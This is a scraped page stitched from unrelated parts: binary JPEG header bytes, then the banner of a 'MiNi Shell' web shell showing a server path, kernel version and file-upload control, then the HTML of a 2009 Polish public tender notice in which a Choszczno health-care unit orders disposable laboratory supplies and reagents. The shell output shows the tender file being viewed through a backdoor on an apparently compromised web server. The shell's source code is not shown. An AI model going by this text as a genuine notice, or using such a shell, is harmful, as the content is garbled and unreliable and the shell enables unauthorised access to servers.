JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090403/91798-N-2009.html

<p class="kh_header"><b>Choszczno: DOSTAWA SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU ORAZ ODCZYNNIKÓW CHEMICZNYCH
DLA
 SP ZOZ W CHOSZCZNIE</b><br>
<b>Numer ogłoszenia: 91798 - 2009; data zamieszczenia: 03.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Niedziałkowskiego 4a, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7652438, 7657211 w 143, faks 095 7652410.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozchoszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU MEDYCZNEGO JEDNORAZOWEGO UŻYTKU ORAZ ODCZYNNIKÓW CHEMICZNYCH
DLA
 SP ZOZ W CHOSZCZNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest dostawa sprzętu medycznego jednorazowego użytku oraz odczynników chemicznych do laboratorium SP ZOZ w Choszcznie wyszczególnione w załączniku nr 2 do SIWZ podzielonym na cztery pakiety. Szczegóły patrz załącznik nr 2 do SIWZ.
Zamawiający dopuszcza możliwość składania ofert częściowych na wymienione w niniejszej specyfikacji istotnych warunków zamówienia zadania, z których każde stanowi odrębną część przedmiotu zamówienia zwanego pakietem oznaczonym w załączniku nr 2 do SIWZ liczbami rzymskimi. Zadaniem jest pakiet. Pakietów jest cztery. Opis pakietów zawiera załącznik nr 2 do SIWZ - formularz asortymentowo cenowy. Ofertę można składać na wszystkie pakiety  i równie dobrze na jeden pakiet. Każdy pakiet oceniany i rozpatrywany jest oddzielnie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7, 33.69.63.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie poniższych warunków:
.	Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień ( np. koncesje, zezwolenia i licencje);
.	Posiadający niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
.	Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;  nie podlegający wykluczeniu z postępowania o udzielenie zamówienia;
.	Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.

2.	Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:

.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w pkt. 1.,
.	Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 Prawa zamówień publicznych, 
.	Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
.	Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
.	Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust.3.
.	Nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

3.	Zamawiający odrzuca ofertę wykonawcy:

.	Jeżeli jest niezgodna z ustawą; 
.	Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust 2 pkt 3, 
.	Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
.	Zawierającą rażąco niską cenę w stosunku do przedmiotu zamówienia,  
.	Wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub nie zaproszonego do składania ofert, 
.	Zawierającą błędy w obliczeniu ceny. 
.	Który w terminie 3 dni od dnia doręczenia  zawiadomienia nie zgodził się na poprawienie omyłki o której mowa w art. 87 ust. 2 pkt 3;
.	Nieważnej na podstawie odrębnych przepisów.

4.	Ocena spełniania w.w warunków  dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż warunki w.w zostały przez Wykonawcę spełnione. Nie spełnienie chociaż jednego z w/w warunków wyklucza Wykonawcę z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na ofertę składają się następujące dokumenty i załączniki:
.	Formularz ofertowy (zał. nr 1 do SIWZ;)
.	Formularz asortymentowo-cenowy (zał. nr 2 do SIWZ);
.	Oświadczenie oferenta potwierdzające spełnianie wymagań określonych w art. 22 ust.1 ustawy PzP, oraz o nie podleganiu wykluczeniu na podstawie art. 24  ( zał. nr 3 do SIWZ).
.	Zatwierdzony projekt umowy (załącznik nr 4 do SIWZ)
.	Oświadczenie o atestach stanowiące załącznik nr 5 do SIWZ.

2.  W celu potwierdzenia, że wykonawca posiada uprawnienie do   wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych składa następujące dokumenty:
1) koncesji, zezwolenia lub licencji, jeżeli ustawy nakładają obowiązek posiadania koncesji,
zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem
publicznym, zwanym dalej zamówieniem;
2) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem
terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;


3.  W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty:
1) stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.



4. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej
Polskiej, zamiast dokumentów, o których mowa w ust.2 pkt. 1
Ust. 1 pkt 2, 3 i 5 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne
albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty
zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
ust. 1 pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju
pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
2. Dokumenty, o których mowa w ust. 1 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ust. 1 pkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.

 




 5.  Dokumenty wymagane w przypadku składania oferty wspólnej: 

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarciu umowy.

6.       Inne wymagane dokumenty
Aktualne świadectwo rejestracji Ministerstwa zdrowia lub świadectwo dopuszczenia do stosowania, lub pozytywną opinię o wyrobie medycznym lub deklarację zgodności CE zgodnie z ustawą z dnia 20.04.2004 roku o wyrobach medycznych (DZ. U. z 2004 r. nr 93 poz. 896 z póź. zm.) jeżeli ustawy nakładają obowiązek posiadania w/w. dokumentów (załącznik nr 5)


Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. VI    dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.   

Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.spzozchoszczno.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej. 
73-200 Choszczno 
ulica Niedziałkowskiego 4A 
Pokój nr 305 (sekretariat Dyrektora)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.04.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej. 
73-200 Choszczno 
ulica Niedziałkowskiego 4A 
Pokój nr 305 (sekretariat Dyrektora)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> sprzet jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nakłuwacz 2,4 jednorazowy sterylny	szt.	30 000
Pipety Pasteura plastikowe niejałowe 3ml	szt.	12 000
Probówka do morfologii z rozpylonym EDTA-K2 z kapilarą na 200ul	szt.	1 500
Probówka z polipropylenu stożkowa z kołnierzem 7ml ze znacznikami	szt.	25 500
Korki do probówek z pozycji 4	szt.	5 000
Probówki z polistyrenu przejrzyste okrągłodenne 4ml/12x75/serologia	szt.	15 000
Probówka z rozpylonym EDTA-K2, poj. 1ml do morfologii z korkiem 	szt.	30 000
Probówka biochemiczna do preparacji surowicy 4ml z polipropylenu	szt.	20 000
z korkiem,granulatem i wykrzepiaczem do szybkiego wykrzepiania		
Probówka biochemiczna do preparacji surowicy 9-11ml z polipropylenu	szt.	10 000
z korkiem,granulatem i wykrzepiaczem do szybkiego wykrzepiania		
Probówki biochemiczne z heparyną litową na 5-11 ml krwi z korkiem	szt.	3 000
Zestaw do OB na 1 ml krw i/probówka z cytr. Na+ rurka do OB./	szt.	20 000
Probówki do koagulologii z korkiem na 1.8 ml krwi	szt.	10 000
Probówki typu Eppendorf o poj. 1,5ml stożkowe	szt.	20 000
Pojemniki plastikowe do badania moczu niesterylne poj. od 60 -120 ml	szt.	30 000
Pojemniki plastikowe do badania moczu sterylne poj. od 60 -120 ml	szt.	2 000
Naczyńka do analizatora Cobas 0.7ml	szt.	5 000
Naczyńka do analizatora Technicon 0.5ml	szt.	3 000
Naczyńka do analizatora Technicon 2ml	szt.	10 000
Szkiełka podstawowe cięte z matowym rantem do opisu /op.50szt./	op.	30
Szkiełka podstawowe cięte, gładkie /op.50szt./	op.	100
Szkiełka nakrywkowe 20x20 mm /op.100 szt/	op.	50
Płyty do określania grup krwi na 8 testów z polistyrenu	szt.	1 000
Kapilary heparynowane ze znacznikiem 50ul /op.1000 szt/	op.	30
Kapilary heparynowane do gazometrii bez znacznika poj. 100-130ul	szt.	1 000
Bagietka laboratoryjna z polipropylenu	szt.	10 000
Bagietki koagulologiczne z polipropylenu z harpunem i łopatką	szt.	2 000
Końcówki do pipet automatycznych do 200ul /żółta/	szt.	4 000
Końcówki do pipet automatycznych do 1 000ul /niebieska/	szt.	5 000
Pojemniki na próbki kału poj.60ml z zakrętką i łopatką	szt.	2000
Pojemniki na odpady laboratoryjne i medyczne 0,5l z przykrywką	szt.	60
Pojemniki na odpady laboratoryjne i medyczne 2l z przykrywką	szt.	500.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odczynniki do aparatu metrolab 2300.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mikroalbumina w moczu	ozn.	200
CK odczynnik	ozn.	400
CK_MB odczynnik	ozn.	400
LDH odczynnik	ozn.	400
Białko w moczu odczynnik z czerwienią pyrogalową	ozn.	2000
Zestaw ISE	op.	2
Elektroda referencyjna	szt.	2
Elektroda Na	szt.	2
Elektroda Cl	szt.	3
Elektroda K	szt.	2
Glukoza odczynnik /2x500 ml/	ozn.	28000
Płyny myjące	szt.	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> podłoże do hodowli rzęsistka.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> podłoże do hodowli rzęsistka.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> odczynniki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Paski 10-p. do bad.moczu 	100 ozn.	80
Paski do ozn.cukru i ketonów	100 ozn.	80
Mocz kontrolny normalny	szt.	24
Mocz kontrolny patologiczny	szt.	24.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 11.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com